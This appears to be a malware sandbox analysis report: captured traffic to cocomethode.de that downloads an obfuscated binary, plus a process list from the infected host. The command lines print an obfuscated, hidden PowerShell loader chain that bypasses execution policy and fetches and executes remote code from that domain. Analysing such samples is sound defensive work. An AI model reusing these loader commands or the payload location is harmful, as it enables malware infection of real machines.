2024-12-11 11:30:14 UTC	1369	IN	Data Raw: 94 1f dc 87 be 5d e1 7f 57 1f da 52 74 52 f1 57 1f dc 57 1f da 5a d6 2e 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be bd e2 7f 57 1f da 52 74 52 f1 57 1f dc 57 1f da 5a 3e 2e 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 9d e2 7f 57 1f da 52 44 52 f1 57 1f dc 57 1f da 5a 06 2e 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be fd e2 7f 57 1f da 52 54 52 f1 57 1f dc 57 1f da 5a 6e 2e 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be dd e2 7f 57 1f da 52 bc 53 f1 57 1f dc 57 1f da 5a 76 2e 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 3d e2 7f 57 1f da 52 84 53 f1 57 1f dc 57 1f da 5a 5e 2e 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 1d e2 7f 57 1f da 52 ec 53 f1 57 1f dc 57 1f da 5a a6 2f 0f 57 1f d4 6e 57 22 56 94 1f dc 87 be 7d e2 7f 57 1f da 52 f4 53 f1 57 1f dc 57 1f da 5a 8e 2f 0f 57 1f d4 6e 57 22 Data Ascii: ]WRtRWWZ.WnW"VWRtRWWZ>.WnW"VWRDRWWZ.WnW"VWRTRWWZn.WnW"VWRSWWZv.WnW"V=WRSWWZ^.WnW"VWRSWWZ/WnW"V}WRSWWZ/WnW"

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.11.20	49766	104.21.1.51	443

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:31:07 UTC	71	OUT	GET /StaticFile/TermServiceTryRun/12 HTTP/1.1 Host: cocomethode.de
2024-12-11 11:31:07 UTC	1354	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:31:07 GMT Content-Type: application/octet-stream Content-Length: 2183168 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image hash: BFF2365257251B6BA227A5E748DBD62E CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=07qOO%2BeT9%2FGYY7Z7TyBVYj4Q04G%2FwlwuCGmobOCxJyHTtsKa6cDJtH8h0vwarrMomlmmOdGI5ZT977qkdk9IotgrPEgYGwqamry2UazScIaNJC0GyJOq8NuD2BCl3lf0USXdkdxlDimC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=49245&min_rtt=1050&rtt_var=5035&sent=10724&recv=4798&lost=0&retrans=0&sent_bytes=15118795&recv_bytes=98693&delivery_rate=50868434&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f052582882fbaec-ATL server-timing: cfL4;desc="?proto=TCP&rtt=52&min_rtt=52&rtt_var=26&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=113993&min_rtt=113965&rtt_var=24093&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=709&delivery_rate=33559&cwnd=240&unsent_bytes=0&cid=5bfed2ffcdb52ea9&ts=850&x=0"
2024-12-11 11:31:07 UTC	15	IN	Data Raw: 41 56 5c 0c 0e 0c 0c 0c 08 0c 03 0c f3 f3 0c Data Ascii: AV\
2024-12-11 11:31:07 UTC	1369	IN	Data Raw: 0c b4 0c 0c 0c 0c 0c 0c 0c 4c 0c 16 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0d 0c 0c b6 1c 0c 02 13 b8 05 c1 2d b4 0d 40 c1 2d 9c 9c 58 64 65 7f 2c 7c 7e 63 6b 7e 6d 61 2c 61 79 7f 78 2c 6e 69 2c 7e 79 62 2c 79 62 68 69 7e 2c 5b 65 62 3f 3e 01 06 28 3b 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 5c 49 0c 0c 40 0d 07 0c 38 54 e2 6a 0c 0c Data Ascii: L-@-Xde,\|~ck~ma,ayx,ni,~yb,ybhi~,[eb?>(;\I@8Tj
2024-12-11 11:31:07 UTC	1369	IN	Data Raw: f3 f3 f3 73 0e 0c 0c 0c 78 1d 4c 0c 0d 06 42 6d 78 65 7a 69 59 45 62 78 09 0c 0c 0c 0c f3 f3 f3 f3 0e 0c 0c 9c 1d 4c 0c 08 0a 5f 65 62 6b 60 69 0c 0e 0c 0c ac 1d 4c 0c 08 04 49 74 78 69 62 68 69 68 0e 0e 0c 0c 0c 0c b8 1d 4c 0c 08 0a 48 63 79 6e 60 69 0d 0e 0c 0c c8 1d 4c 0c 08 08 4f 63 61 7c 0f 0e 0c 0c 0c 0c d8 1d 4c 0c 08 04 4f 79 7e 7e 69 62 6f 75 08 0e 0c 0c 0c 0c e4 1d 4c 0c 09 07 5f 64 63 7e 78 5f 78 7e 65 62 6b f3 0e 0c f0 1d 4c 0c 18 05 5c 4d 62 7f 65 4f 64 6d 7e 3c 1c 4c 0c 0e 0c 0c 0c 0c 18 1e 4c 0c 18 05 5c 5b 65 68 69 4f 64 6d 7e 40 1c 4c 0c 0e 0c 0c 0c 0c 20 1e 4c 0c 0f 04 4e 75 78 69 4e 63 63 60 0c 0c 0c 0c 8c f3 f3 f3 73 24 1e 4c 0c 09 4a 6d 60 7f 69 08 58 7e 79 69 0a 5f 75 7f 78 69 61 0e 0c 0c 50 1e 4c 0c 0f 04 5b 63 7e 68 4e 63 63 60 0e Data Ascii: sxLBmxeziYEbxL_ebk`iLItxibhihLHcyn`iLOca\|LOy~~ibouL_dc~x_x~ebkL\MbeOdm~<LL\[ehiOdm~@L LNuxiNcc`s$LJm`iX~yi_uxiaPL[c~hNcc`
2024-12-11 11:31:07 UTC	1369	IN	Data Raw: 7f 7f 58 64 6d 62 0c 0c 0c 1c 4c 0c 0e 1e 94 19 4c 0c 08 40 69 6a 78 0e 0c 1e 94 19 4c 0c 09 5e 65 6b 64 78 0e 0c 0e 0c 07 a8 82 4c 0c 1f 2a 63 7c 53 40 69 7f 7f 58 64 6d 62 43 7e 49 7d 79 6d 60 0c 0c 0c 1c 4c 0c 0e 1e 94 19 4c 0c 08 40 69 6a 78 0e 0c 1e 94 19 4c 0c 09 5e 65 6b 64 78 0e 0c 0e 0c 70 1b 4c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ac 13 4c 0c 0c 0c 0c 0c 70 1b 4c 0c 0c 0c 0c 0c 9e 14 4c 0c 04 0c 0c 0c 0c 0c 0c 0c 10 9c 4c 0c 28 9c 4c 0c 00 9f 4c 0c 08 9f 4c 0c 28 9f 4c 0c 24 9f 4c 0c 20 9f 4c 0c 2c 9f 4c 0c e0 81 4c 0c 08 82 4c 0c fc 82 4c 0c 0c 0c 2e 0c 96 14 4c 0c 48 0c f8 f3 cc 14 4c 0c 4e 0c f8 f3 e8 14 4c 0c 4e 0c f8 f3 01 15 4c 0c 4f 0c f8 f3 47 15 4c 0c 4e 0c f8 f3 76 15 4c 0c 4e 0c f8 f3 af 15 4c 0c 4f 0c f8 f3 db 15 4c 0c 4f 0c f8 f3 Data Ascii: XdmbLL@ijxL^ekdxL*c\|S@iXdmbC~I}ym`LL@ijxL^ekdxpLLpLLL(LLL(L$L L,LLLL.LHLNLNLOGLNvLNLOLO
2024-12-11 11:31:07 UTC	742	IN	Data Raw: 0e 04 90 13 4c 0c 0c 0c 08 5f 69 60 6a 0e 0c 0e b4 1e 4c 0c 0d 0c 08 42 6d 61 69 0e 0c 0e 0c 4a 0c 24 9c 4c 0c 00 4b 69 78 45 62 78 69 7e 6a 6d 6f 69 0f 0c 0c 1c 4c 0c 04 0c 0f 04 90 13 4c 0c 0c 0c 08 5f 69 60 6a 0e 0c 1e 4c 1f 4c 0c 0d 0c 0f 45 45 48 0e 0c 2c 0c 0c 0c 0c 0e 0c 0f 43 6e 66 0e 0c 0e 0c 32 0c 80 9c 4c 0c 1d 4b 69 78 45 62 78 69 7e 6a 6d 6f 69 49 62 78 7e 75 0f 0c ac 18 4c 0c 04 0c 0e 0c 0c 0c 0c 0c 0c 0c 08 5f 69 60 6a 0e 0c 1e 4c 1f 4c 0c 0d 0c 0f 45 45 48 0e 0c 0e 0c 3d 0c 18 83 4c 0c 1d 4b 69 78 45 62 78 69 7e 6a 6d 6f 69 58 6d 6e 60 69 0f 0c 20 19 4c 0c 04 0c 0d 0c 0c 0c 0c 0c 0c 0c 08 5f 69 60 6a 0e 0c 0e 0c 3f 0c dc 9c 4c 0c 04 59 62 65 78 42 6d 61 69 0f 0c b4 1e 4c 0c 04 0c 0e 0c 0c 0c 0c 0c 0c 0c 08 5f 69 60 6a 0e 0c 4c b4 1e 4c 0c Data Ascii: L_i`jLBmaiJ$LKixEbxi~jmoiLL_i`jLLEEH,Cnf2LKixEbxi~jmoiIbx~uL_i`jLLEEH=LKixEbxi~jmoiXmn`i L_i`j?LYbexBmaiL_i`jLL
2024-12-11 11:31:08 UTC	1369	IN	Data Raw: 0c 08 5f 69 60 6a 0e 0c 0d 0c 0c 0c 0c 0d 0c 0b 41 69 7f 7f 6d 6b 69 0e 0c 0e 0c 27 0c e0 81 4c 0c 07 42 69 7b 45 62 7f 78 6d 62 6f 69 0f 0c 90 13 4c 0c 04 0c 0d 0c 0c 0c 0c 0c 0c 0c 08 5f 69 60 6a 0e 0c 0e 0c 20 0c 08 82 4c 0c 00 4a 7e 69 69 45 62 7f 78 6d 62 6f 69 0f 0c 0c 0c 0c 0c 04 0c 0d 04 90 13 4c 0c 0c 0c 08 5f 69 60 6a 0e 0c 0e 0c 2b 0c fc 82 4c 0c 0b 48 69 7f 78 7e 63 75 0f 0c 0c 0c 0c 0c 04 0c 0d 04 90 13 4c 0c 0c 0c 08 5f 69 60 6a 0e 0c 0e 0c 0c 0c 0c ac 13 4c 0c 0b 0b 58 43 6e 66 69 6f 78 70 1b 4c 0c 0c 0c 0c 0c 0c 0c 0a 5f 75 7f 78 69 61 0c 0c 0c 0c 0e 0c 0c 0c 0c 0c 10 2c 4c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 34 2c 4c 0c 0c 0c 0c 0c 10 2c 4c 0c 0c 0c 0c 0c 2e 2c 4c 0c 04 0c 0c 0c 28 1b 4c 0c 10 9c 4c 0c 28 9c 4c 0c 00 9f 4c 0c 08 9f 4c Data Ascii: _i`jAimki'LBi{EbxmboiL_i`j LJ~iiEbxmboiL_i`j+LHix~cuL_i`jLXCnfioxpL_uxia,L4,L,L.,L(LL(LLL
2024-12-11 11:31:08 UTC	1369	IN	Data Raw: 63 6f 67 0e 0c 0e 0c 0e 0c 04 04 9a 4c 0c 09 49 62 78 69 7e 0c 0c 0c 0c 0c 0c 0c 0e 0c 04 38 9a 4c 0c 08 49 74 65 78 0c 0c 0c 0c 0c 0c 0c 0e 0c 0c 0c 0c 9c 28 4c 0c 02 04 58 41 63 62 65 78 63 7e 10 0c 0c 0c 0c 0c 0c 0c 0c 0b 0c 0c 0c 90 1c 4c 0c 0c 0c 0c 0c 0c 06 4a 40 63 6f 67 4f 63 79 62 78 00 0c 3c 2e 4c 0c dc 82 4c 0c 0c 0c 90 1c 4c 0c 08 0c 0c 0c 0c 03 4a 5e 69 6f 79 7e 7f 65 63 62 4f 63 79 62 78 0e 0c e8 1c 4c 0c 04 0c 0c 0c 0c 01 4a 43 7b 62 65 62 6b 58 64 7e 69 6d 68 0e 0c 0c 1d 4c 0c 00 0c 0c 0c 0c 06 4a 40 63 6f 67 49 7a 69 62 78 0e 0c 90 1c 4c 0c 1c 0c 0c 0c 0c 06 4a 5f 7c 65 62 4f 63 79 62 78 0e 0c 90 2f 4c 0c 18 0c 0c 0c 0c 06 4a 5b 6d 65 78 5d 79 69 79 69 0e 0c 24 28 4c 0c 14 0c 0c 0c 0c 06 4a 5d 79 69 79 69 40 63 6f 67 0e 0c 0e 0c 05 0c 05 Data Ascii: cogLIbxi~8LItex(LXAcbexc~LJ@cogOcybx<.LLLJ^ioy~ecbOcybxLJC{bebkXd~imhLJ@cogIzibxLJ_\|ebOcybx/LJ[mex]yiyi$(LJ]yiyi@cog
2024-12-11 11:31:08 UTC	1369	IN	Data Raw: 0c 0c 0c 0c 0c 0c e4 2a 4c 0c 18 26 4c 0c 94 25 4c 0c 0c 0c 0c 0c 0c 0c 0c 0c 3c 26 4c 0c 0c 0c 0c 0c 18 26 4c 0c 0c 0c 0c 0c 16 26 4c 0c 00 0c 0c 0c 28 1b 4c 0c 10 9c 4c 0c 28 9c 4c 0c 00 9f 4c 0c 08 9f 4c 0c 28 9f 4c 0c 24 9f 4c 0c 20 9f 4c 0c 2c 9f 4c 0c e0 81 4c 0c 08 82 4c 0c fc 82 4c 0c 0c 0c 0c 0c 0c 0c 1d 58 42 63 5e 69 6a 4f 63 79 62 78 43 6e 66 69 6f 78 3c 26 4c 0c 0b 1d 58 42 63 5e 69 6a 4f 63 79 62 78 43 6e 66 69 6f 78 18 26 4c 0c 90 13 4c 0c 0c 0c 0a 5f 75 7f 78 69 61 0c 0c 0c 0c 0e 0c 0c 0c 6c 26 4c 0c 18 00 5c 5f 64 63 7e 78 5f 78 7e 65 62 6b e8 1d 4c 0c 0e 0c 74 26 4c 0c 06 06 59 58 4a 34 5f 78 7e 65 62 6b e5 f1 0e 0c 80 26 4c 0c 06 01 5e 6d 7b 4e 75 78 69 5f 78 7e 65 62 6b f3 f3 0e 0c 0c a8 26 4c 0c 18 09 5c 4e 75 78 69 b8 1c 4c 0c 0e 0c Data Ascii: *L&L%L<&L&L&L(LL(LLL(L$L L,LLLLXBc^ijOcybxCnfiox<&LXBc^ijOcybxCnfiox&LL_uxial&L\_dc~x_x~ebkLt&LYXJ4_x~ebk&L^m{Nuxi_x~ebk&L\NuxiL
2024-12-11 11:31:08 UTC	1369	IN	Data Raw: 62 6b 7f 0e 0c 0c 0c 0c 0c 0e 0c 0c 0c 0e 0a 5a 5b 63 7e 68 7f 0e 0c 0c 0c 0c 0c 0e 0c 0c 0c 0e 0a 5a 4e 75 78 69 7f 0e 0c 0c 0c 0c 0c 0c 0c 0c 0c 0e 0b 5e 6d 7b 48 6d 78 6d 0e 0c 0e 0c 0c 0c 0c 5c 23 4c 0c 0f 05 58 58 75 7c 69 47 65 62 68 0d 0c 0c 0c 0c 1a 0c 0c 0c 40 23 4c 0c 05 78 67 59 62 67 62 63 7b 62 05 78 67 45 62 78 69 6b 69 7e 0a 78 67 4f 64 6d 7e 01 78 67 49 62 79 61 69 7e 6d 78 65 63 62 0b 78 67 4a 60 63 6d 78 04 78 67 5f 78 7e 65 62 6b 09 78 67 5f 69 78 0b 78 67 4f 60 6d 7f 7f 04 78 67 41 69 78 64 63 68 0b 78 67 5b 4f 64 6d 7e 05 78 67 40 5f 78 7e 65 62 6b 05 78 67 5b 5f 78 7e 65 62 6b 05 78 67 5a 6d 7e 65 6d 62 78 0b 78 67 4d 7e 7e 6d 75 04 78 67 5e 69 6f 63 7e 68 07 78 67 45 62 78 69 7e 6a 6d 6f 69 0b 78 67 45 62 78 3a 38 06 78 67 48 75 62 Data Ascii: bkZ[c~hZNuxi^m{Hmxm\#LXXu\|iGebh@#LxgYbgbc{bxgEbxiki~xgOdm~xgIbyai~mxecbxgJ`cmxxg_x~ebkxg_ixxgO`mxgAixdchxg[Odm~xg@_x~ebkxg[_x~ebkxgZm~embxxgM~~muxg^ioc~hxgEbxi~jmoixgEbx:8xgHub
2024-12-11 11:31:08 UTC	1369	IN	Data Raw: 4f 0c f8 f3 bd 32 4c 0c 4f 0c f8 f3 0f 33 4c 0c 4f 0c f8 f3 5a 33 4c 0c 4f 0c f8 f3 a5 33 4c 0c 4f 0c f8 f3 f0 33 4c 0c 4f 0c f8 f3 41 4c 4c 0c 4f 0c f8 f3 9e 4c 4c 0c 4f 0c f8 f3 d4 4c 4c 0c 4f 0c f8 f3 12 4d 4c 0c 4f 0c f8 f3 68 4d 4c 0c 4f 0c f8 f3 a4 4d 4c 0c 4f 0c f8 f3 fa 4d 4c 0c 4f 0c f8 f3 20 4e 4c 0c 4f 0c f8 f3 68 4e 4c 0c 4f 0c f8 f3 ac 4e 4c 0c 4f 0c f8 f3 d7 4e 4c 0c 4f 0c f8 f3 15 4f 4c 0c 4f 0c f8 f3 65 4f 4c 0c 4f 0c f8 f3 a6 4f 4c 0c 4f 0c f8 f3 ea 4f 4c 0c 4f 0c f8 f3 38 48 4c 0c 4f 0c f8 f3 7e 48 4c 0c 4f 0c f8 f3 a2 48 4c 0c 4f 0c f8 f3 0f 49 4c 0c 4f 0c f8 f3 66 49 4c 0c 4f 0c f8 f3 ce 49 4c 0c 4f 0c f8 f3 1b 4a 4c 0c 4f 0c f8 f3 89 4a 4c 0c 4f 0c f8 f3 e8 4a 4c 0c 4f 0c f8 f3 4c 4b 4c 0c 4f 0c f8 f3 aa 4b 4c 0c 4f 0c f8 f3 12 44 4c Data Ascii: O2LO3LOZ3LO3LO3LOALLOLLOLLOMLOhMLOMLOMLO NLOhNLONLONLOOLOeOLOOLOOLO8HLO~HLOHLOILOfILOILOJLOJLOJLOLKLOKLODL

Target ID:	0
Start time:	06:28:55
Start date:	11/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /v /k "pOWERsheLl.eXE -WINDoWSTylE hiDdEN -EncoDEdCommAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEUAOABBAFIAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEARgBRAEEAVQB3AEIAMABBAEYASQBBAFMAUQBCAE8AQQBHAGMAQQBLAEEAQQBvAEEARQBrAEEAZAB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAFEAQQBGAE0AQQBNAEEAQQAxAEEARwAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARwA0AEEAVgBBAEIARgBBAEcANABBAGQAQQBBAHAAQQBDAGsAQQAiAA=="" && exit
Imagebase:	0x7ff61f9e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	06:28:55
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62e4d0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:28:55
Start date:	11/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	pOWERsheLl.eXE -WINDoWSTylE hiDdEN -EncoDEdCommAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEUAOABBAFIAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEARgBRAEEAVQB3AEIAMABBAEYASQBBAFMAUQBCAE8AQQBHAGMAQQBLAEEAQQBvAEEARQBrAEEAZAB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAFEAQQBGAE0AQQBNAEEAQQAxAEEARwAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARwA0AEEAVgBBAEIARgBBAEcANABBAGQAQQBBAHAAQQBDAGsAQQAiAA=="
Imagebase:	0x7ff796130000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:28:55
Start date:	11/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAFQAUwB0AFIASQBOAGcAKAAoAEkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBQAFMAMAA1AG0AIgApACkAKQApAC4AQwBPAG4AVABFAG4AdAApACkA
Imagebase:	0x7ff796130000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:28:55
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62e4d0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:28:58
Start date:	11/12/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\40v0i4f3\40v0i4f3.cmdline"
Imagebase:	0x7ff611590000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:28:58
Start date:	11/12/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD097.tmp" "c:\Users\user\AppData\Local\Temp\40v0i4f3\CSCD6446BB959A24110B54C9D2694B6A8A7.TMP"
Imagebase:	0x7ff7fb340000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:29:05
Start date:	11/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Imagebase:	0x7ff796130000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	06:29:05
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62e4d0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

